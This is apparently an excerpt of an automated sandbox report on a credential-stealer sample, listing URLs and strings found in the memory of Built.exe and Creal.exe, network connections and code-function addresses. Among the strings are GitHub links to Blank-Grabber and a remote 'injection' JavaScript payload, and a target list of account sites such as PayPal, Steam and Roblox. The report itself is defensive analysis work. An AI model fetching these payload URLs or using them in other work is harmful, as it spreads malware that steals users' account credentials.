              Source: Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: Creal.exe, 00000005.00000002.2427584689.00000203E8BC0000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381047340.00000203E7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
              Source: Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414247478.00000203E7916000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412656976.00000203E78F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2410071917.00000203E78F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
              Source: Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
              Source: Built.exe, 00000004.00000002.2173551673.000002D967E88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)
              Source: Creal.exe, 00000005.00000003.2379514476.00000203E78D6000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2402674199.00000203E77AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: Creal.exe, 00000005.00000003.2372707280.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378468400.00000203E7476000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2163437726.00000203E795D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377974542.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374846297.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E7459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
              Source: Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minecraft.net)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://netflix.com)
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405592368.00000203E7B93000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://origin.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
              Source: Creal.exe, 00000005.00000003.2414830024.00000203E794B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412479725.00000203E794B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2419800987.00000203E794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/PR
              Source: Creal.exe, 00000005.00000003.2406764500.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
              Source: Creal.exe, 00000005.00000003.2414830024.00000203E794B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412479725.00000203E794B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2419800987.00000203E794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: Built.exe, 00000004.00000002.2173551673.000002D967E84000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2171255511.000002D967E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)
              Source: Built.exe, 00000004.00000002.2163568544.000002D966D30000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2131604706.00000203E7011000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2148491912.00000203E707A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2153636025.00000203E74A5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2153201608.00000203E70FC000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2156593481.00000203E74A5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418146439.00000203E75A0000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2154911664.00000203E74A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp, Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
              Source: Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
              Source: Creal.exe, 00000005.00000002.2422504490.00000203E7CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
              Source: Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414247478.00000203E7916000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412656976.00000203E78F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2410071917.00000203E78F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)
              Source: Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/0
              Source: Creal.exe, 00000005.00000003.2153636025.00000203E7418000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2154004007.00000203E742E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
              Source: Creal.exe, 00000005.00000003.2380069030.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2156593481.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2404153286.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2153505234.00000203E7516000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369898360.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2371996192.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2155572489.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2159623093.00000203E753D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2160988388.00000203E753D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
              Source: Creal.exe, 00000005.00000002.2418294898.00000203E76A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
              Source: Creal.exe, 00000005.00000002.2418294898.00000203E76A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
              Source: Creal.exe, 00000005.00000003.2153471711.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
              Source: Creal.exe, 00000005.00000003.2153471711.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
              Source: Creal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
              Source: Built.exe, 00000004.00000002.2164052765.000002D966F30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379589733.00000203E78C0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2384653569.00000203E78C2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380439386.00000203E78C2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376137526.00000203E8430000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380581302.00000203E8451000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376742548.00000203E843A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376177154.00000203E8437000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
              Source: Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2421077059.00000203E7B92000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
              Source: Built.exe, 00000004.00000002.2166572462.000002D967330000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
              Source: Built.exe, 00000004.00000002.2162306766.000002D9667F0000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsp
              Source: Built.exe, 00000004.00000002.2171255511.000002D967DE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: Built.exe, 00000004.00000002.2170655566.000002D967C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: Creal.exe, 00000005.00000003.2389785541.00000203E78D7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376802757.00000203E78D5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379514476.00000203E78D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
              Source: Creal.exe, 00000005.00000003.2371634055.00000203E7400000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E73FF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374432390.00000203E7429000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372707280.00000203E7428000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379465483.00000203E742B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
              Source: Creal.exe, 00000002.00000003.2119357168.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
              Source: Creal.exe, 00000002.00000003.2119423482.0000016B5EEC2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000002.00000003.2119357168.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
              Source: Creal.exe, 00000005.00000003.2375828271.00000203E77F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
              Source: Built.exe, 00000003.00000003.2107944125.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2174953160.00007FFD93659000.00000004.00000001.01000000.00000019.sdmp, Built.exe, 00000004.00000002.2178175184.00007FFD93B6A000.00000004.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2433448767.00007FFD8AFE0000.00000002.00000001.01000000.0000002D.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414247478.00000203E7916000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E790C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2412656976.00000203E78F9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2410071917.00000203E78F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
              Source: Creal.exe, 00000005.00000003.2372707280.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378468400.00000203E7476000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2163437726.00000203E795D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377974542.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374846297.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E7459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
              Source: Built.exe, Built.exe, 00000004.00000002.2178299171.00007FFD946E6000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp, Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: Built.exe, 00000004.00000003.2139013017.000002D966BF9000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2138293820.000002D9670BC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
              Source: Creal.exe, 00000005.00000003.2377575981.00000203E7B5B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375300692.00000203E7B58000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
              Source: Built.exe, 00000004.00000003.2138293820.000002D9670DB000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D9670DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A400C0_2_00007FF6063A400C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60638A8AC0_2_00007FF60638A8AC
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639569C0_2_00007FF60639569C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60638DC4C0_2_00007FF60638DC4C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE00_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A09D80_2_00007FF6063A09D8
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063962940_2_00007FF606396294
